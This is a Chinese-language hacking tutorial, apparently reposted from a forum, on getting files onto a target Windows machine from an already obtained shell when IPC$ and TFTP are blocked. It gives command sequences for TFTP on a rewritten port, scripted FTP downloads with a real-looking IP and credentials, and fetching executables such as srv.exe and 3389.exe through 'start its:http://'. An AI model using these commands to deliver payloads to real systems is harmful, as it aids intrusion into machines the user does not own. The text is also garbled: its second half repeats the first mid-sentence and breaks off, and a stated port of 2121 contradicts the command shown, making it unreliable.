信息来源:haicao.126.com
本文是居于已经得到了一个有一定权限的SHELL.用IPC$传送文件和TFTP
传送文件不可行。实现在命令行下传送文件的其他方法.
一,TFTP+自定义端口
限制用TFTP传送文件,一般就是直接封69端口,我们在用TFTP传送
文件的时候,一般用tftp -i xxx.xxx.xxx.xxx get srv.exe来下载,TFTP
默认的是69端口,那么怎么才能改这个端口了?TFTPD32.exe等TFTP服务端
是可以自己设置端口的,这里就不多讲,只不过在设置后要重新启动一次
TFTP服务端。至于客户端
在system32driversetc文件夹下有一个services文件。打开如下:
=======================
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name> <port number>/<protocol> [aliases...] [#<comment>]
#
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/tcp users #Active users
…
tftp 69/udp #Trivial File Transfer
…
========================
不难看出,69/udp就是定义tftp默认端口的,协议为udp。
好啦!具体怎么用只要这两句,其实就是比原来多加了一句改端口的:
=======================
echo tftp 8300/udp > %systemroot%system32driversetcservices
tftp -i xxx.xxx.xxx.xxx get srv.exe
=======================
注意:请先把tftp服务端端口设定为与自定义端口一样的,这里是8300。
安全点的做法:
=======================
ren %systemroot%system32driversetcservices 1
echo tftp 8300/udp >2
copy 2+%systemroot%system32driversetc1 %systemroot%system32driversetc
services
=======================
二:ftp下载文件
ftp下载文件一般步骤如下:
=======================
echo open xxx.xxx.xxx.xxx >ftp.txt
echo user >>ftp.txt
echo password >>ftp.txt
echo binary >>ftp.txt [可选]
echo get srv.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
del ftp.txt
=======================
这样srv.exe文件就下在下来了。
三:ftp+自定义端口
其实ftp自定义端口非常简单,只要在ip地址后面空格,紧跟自定义的端口就可以了,如下:
=======================
echo open 219.153.2.34 21 >ftp.txt
echo fox >>ftp.txt
echo blackfox >>ftp.txt
echo binary >>ftp.txt [可选]
echo get 3389.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
del ftp.txt
=======================
这里自定义端口为2121,只要和ftp服务端的端口一致就行拉。
四:START ITS:HTTP://IP/文件名
然后
==========================
cd "C:Documents and SettingsDefault UserLocal SettingsTemporary Internet
FilesContent.IE5"
===========================
然后DIR 文件名[1]
注意:那串长文件名要用""引起来,因为有空格
例子:
==========================
C:Documents and SettingsAdministrator>start its:http://xxx.xxx.xxx.xxx/srv.exe
C:Documents and SettingsAdministrator>dir /s srv[1].exe
===========================
驱动器 C 中的卷没有标签。
卷的序列号是 D491-7A7F
======================
C:Documents and SettingsAdministratorLocal SettingsTemporary Internet Files
Content.IE5�AB3MNO1 的目录
2003-11-22 17:48 12,832 srv[1].exe
1 个文件 12,832 字节
=====================
列出所有文件:
1 个文件 12,832 字节
0 个目录 6,425,985,024 可用字节
=======================
C:Documents and SettingsAdministrator>copy C:Documents and Settings
AdministratorLocal SettingsTemporary Internet FilesContent.IE5�AB3MNO1srv[1].exe c:
srv.exe
已复制 1 个文件。
=====================端口的:
=======================
echo tftp 8300/udp > %systemroot%system32driversetcservices
tftp -i xxx.xxx.xxx.xxx get srv.exe
=======================
注意:请先把tftp服务端端口设定为与自定义端口一样的,这里是8300。
安全点的做法:
=======================
ren %systemroot%system32driversetcservices 1
echo tftp 8300/udp >2
copy 2+%systemroot%system32driversetc1 %systemroot%system32driversetc
services
=======================
二:ftp下载文件
ftp下载文件一般步骤如下:
=======================
echo open xxx.xxx.xxx.xxx >ftp.txt
echo user >>ftp.txt
echo password >>ftp.txt
echo binary >>ftp.txt [可选]
echo get srv.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
del ftp.txt
=======================
这样srv.exe文件就下在下来了。
三:ftp+自定义端口
其实ftp自定义端口非常简单,只要在ip地址后面空格,紧跟自定义的端口就可以了,如下:
=======================
echo open 219.153.2.34 21 >ftp.txt
echo fox >>ftp.txt
echo blackfox >>ftp.txt
echo binary >>ftp.txt [可选]
echo get 3389.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
del ftp.txt
=======================
这里自定义端口为2121,只要和ftp服务端的端口一致就行拉。
四:START ITS:HTTP://IP/文件名
然后
==========================
cd "C:Documents and SettingsDefault UserLocal S
回复自“目标机上的下载技巧”
发表回复